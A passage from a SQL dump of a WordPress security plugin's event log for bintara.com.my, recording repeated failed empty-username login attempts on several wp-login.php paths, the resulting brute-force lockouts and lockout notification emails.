Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYu9nkXpgmG5P@iB8k6SwAAAJI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.165.118.82\";s:11:\"REMOTE_PORT\";s:5:\"38232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYu9nkXpgmG5P@iB8k6SwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074934.1814\";s:12:\"REQUEST_TIME\";s:10:\"1569074934\";}}','notice','2019-09-21 14:08:55','2019-09-21 14:08:54',17852920,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.165.118.82'),(26033,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:42:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:42:14\";s:14:\"lockout_expire\";s:19:\"2019-09-22 02:42:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 18:42:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:42:15','2019-09-21 13:42:14',17932640,19339640,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(26034,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:42:15','2019-09-21 13:42:14',18138968,19339640,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.70.191'),(26035,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYo5DDrcQxTmGrCWuaSbwAAAdU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.67.105.124\";s:11:\"REMOTE_PORT\";s:5:\"40708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYo5DDrcQxTmGrCWuaSbwAAAdU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073380.6436\";s:12:\"REQUEST_TIME\";s:10:\"1569073380\";}}','notice','2019-09-21 13:43:02','2019-09-21 13:43:01',17849992,19339984,'https://bintara.com.my/wordpress/wp-login.php',1,0,'13.67.105.124'),(26036,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYo63kXpgmG5P@iB8k1MAAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"41.226.28.41\";s:11:\"REMOTE_PORT\";s:5:\"41844\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYo63kXpgmG5P@iB8k1MAAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073387.3957\";s:12:\"REQUEST_TIME\";s:10:\"1569073387\";}}','notice','2019-09-21 13:43:08','2019-09-21 13:43:07',17848392,19338088,'https://bintara.com.my/2019/wp-login.php',1,0,'41.226.28.41'),(26037,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:43:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:43:07\";s:14:\"lockout_expire\";s:19:\"2019-09-22 02:43:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 18:43:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:43:08','2019-09-21 13:43:07',17933056,19338088,'https://bintara.com.my/2019/wp-login.php',1,0,'41.226.28.41'),(26038,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:43:08','2019-09-21 13:43:07',18139320,19338088,'https://bintara.com.my/2019/wp-login.php',1,0,'41.226.28.41'),(26039,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYpAHkXpgmG5P@iB8k1RgAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"120.79.15.181\";s:11:\"REMOTE_PORT\";s:5:\"49834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYpAHkXpgmG5P@iB8k1RgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073408.4673\";s:12:\"REQUEST_TIME\";s:10:\"1569073408\";}}','notice','2019-09-21 13:43:29','2019-09-21 13:43:28',17846712,19337408,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(26040,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:43:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:43:28\";s:14:\"lockout_expire\";s:19:\"2019-09-22 07:43:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 23:43:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:43:29','2019-09-21 13:43:28',17931600,19337408,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(26041,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:43:29','2019-09-21 13:43:28',18137912,19337408,'https://bintara.com.my/wp/wp-login.php',1,0,'120.79.15.181'),(26042,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYpIXkXpgmG5P@iB8k1dAAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.81.86.38\";s:11:\"REMOTE_PORT\";s:5:\"54042\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYpIXkXpgmG5P@iB8k1dAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073441.2887\";s:12:\"REQUEST_TIME\";s:10:\"1569073441\";}}','notice','2019-09-21 13:44:02','2019-09-21 13:44:01',17846336,19337552,'https://bintara.com.my/wp/wp-login.php',1,0,'103.81.86.38'),(26043,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:44:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:44:01\";s:14:\"lockout_expire\";s:19:\"2019-09-22 07:44:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 23:44:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:44:02','2019-09-21 13:44:01',17931432,19337552,'https://bintara.com.my/wp/wp-login.php',1,0,'103.81.86.38'),(26044,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:44:02','2019-09-21 13:44:01',18137936,19337552,'https://bintara.com.my/wp/wp-login.php',1,0,'103.81.86.38'),(26045,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYpUbfBTP0kPOVnb8jvugAAAEs\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"195.137.202.165\";s:11:\"REMOTE_PORT\";s:5:\"51148\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYpUbfBTP0kPOVnb8jvugAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569073489.323\";s:12:\"REQUEST_TIME\";s:10:\"1569073489\";}}','notice','2019-09-21 13:44:51','2019-09-21 13:44:49',17852680,19338240,'https://bintara.com.my/test/wp-login.php',1,0,'195.137.202.165'),(26046,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:44:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:44:49\";s:14:\"lockout_expire\";s:19:\"2019-09-22 07:44:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 23:44:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:44:51','2019-09-21 13:44:49',17937120,19338240,'https://bintara.com.my/test/wp-login.php',1,0,'195.137.202.165'),(26047,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:44:51','2019-09-21 13:44:49',18143448,19338240,'https://bintara.com.my/test/wp-login.php',1,0,'195.137.202.165'),(26048,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 